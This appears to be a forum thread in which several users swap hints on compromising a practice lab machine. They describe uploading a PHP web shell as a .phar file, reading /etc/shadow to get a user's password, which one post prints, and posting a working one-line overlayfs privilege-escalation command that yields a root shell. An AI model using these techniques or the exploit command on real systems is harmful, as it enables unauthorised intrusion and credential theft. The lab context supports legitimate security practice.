Posts: 10
Threads: 0
Joined: Oct 2023
(Nov 18, 2023, 08:52 PM)theart42 Wrote: (Nov 18, 2023, 08:33 PM)take1312 Wrote: (Nov 18, 2023, 08:31 PM)peRd1 Wrote: (Nov 18, 2023, 08:21 PM)take1312 Wrote: (Nov 18, 2023, 08:14 PM)bigdwarf123 Wrote: I'm able to upload .ps1 files but when I access them at /uploads/shell.ps1 they don't execute, the browser just prints the script in clear text. Anyone know what to do about that?
(Nov 18, 2023, 08:17 PM)theart42 Wrote: same for me.
I can also upload php as .phar and it is run when I call /uploads/cmd.phar, but it is really limited in what it can do...
https://github.com/flozz/p0wny-shell
use this shell as .phar Then stabilize your shell...
yes you can find mysql creds and after revers shell enter it
there are two ips if you look at the interfaces.
192.168.5.1
192.168.5.2
I saw them, and assume we're in a docker container of sorts
still looking to become a doctor in the container...
I don't think this is a docker container, if this was a docker container there would be a .dockerenv file
Posts: 56
Threads: 4
Joined: Sep 2023
get root in the limited shell/ container
via
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
Posts: 148
Threads: 2
Joined: Oct 2023
(Nov 18, 2023, 09:37 PM)take1312 Wrote: get root in the limited shell/ container
via
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
Ubuntu POC game overlay shit works.
Posts: 56
Threads: 4
Joined: Sep 2023
(Nov 18, 2023, 09:39 PM)peRd1 Wrote: (Nov 18, 2023, 09:37 PM)take1312 Wrote: get root in the limited shell/ container
via
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
Ubuntu POC game overlay shit works.
which one did you use?
https://www.reddit.com/r/selfhosted/comm...e20232640/
Posts: 56
Threads: 4
Joined: Sep 2023
Nov 18, 2023, 09:44 PM
(This post was last modified: Nov 18, 2023, 09:45 PM by take1312.)
(Nov 18, 2023, 09:43 PM)VfV Wrote: (Nov 18, 2023, 09:37 PM)take1312 Wrote: get root in the limited shell/ container
via
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
It's exiting right after running that command.
bash: cannot set terminal process group (968): Inappropriate ioctl for device
bash: no job control in this shell
root@webserver:/var/www/html/uploads# exit
root@webserver:/var/www/html/uploads# exit
you were root already. congratz its running for you. my machine was reverted and ca´t get it working again. if you find something keep me posted please
Posts: 56
Threads: 4
Joined: Sep 2023
got drwilliams ssh credentials
Posts: 134
Threads: 13
Joined: Sep 2023
(Nov 18, 2023, 09:58 PM)take1312 Wrote: got drwilliams ssh credentials
in all the github/go folders?
Posts: 10
Threads: 0
Joined: Oct 2023
(Nov 18, 2023, 10:12 PM)chillywilly Wrote: (Nov 18, 2023, 09:58 PM)take1312 Wrote: got drwilliams ssh credentials
in all the github/go folders? /etc/shadow
Posts: 56
Threads: 4
Joined: Sep 2023
password is
qwe123!@#
gl folks i´m out machine reverting every 10 mins. dam apes
Posts: 25
Threads: 1
Joined: Oct 2023
Hello i need nudge for foothold user
|
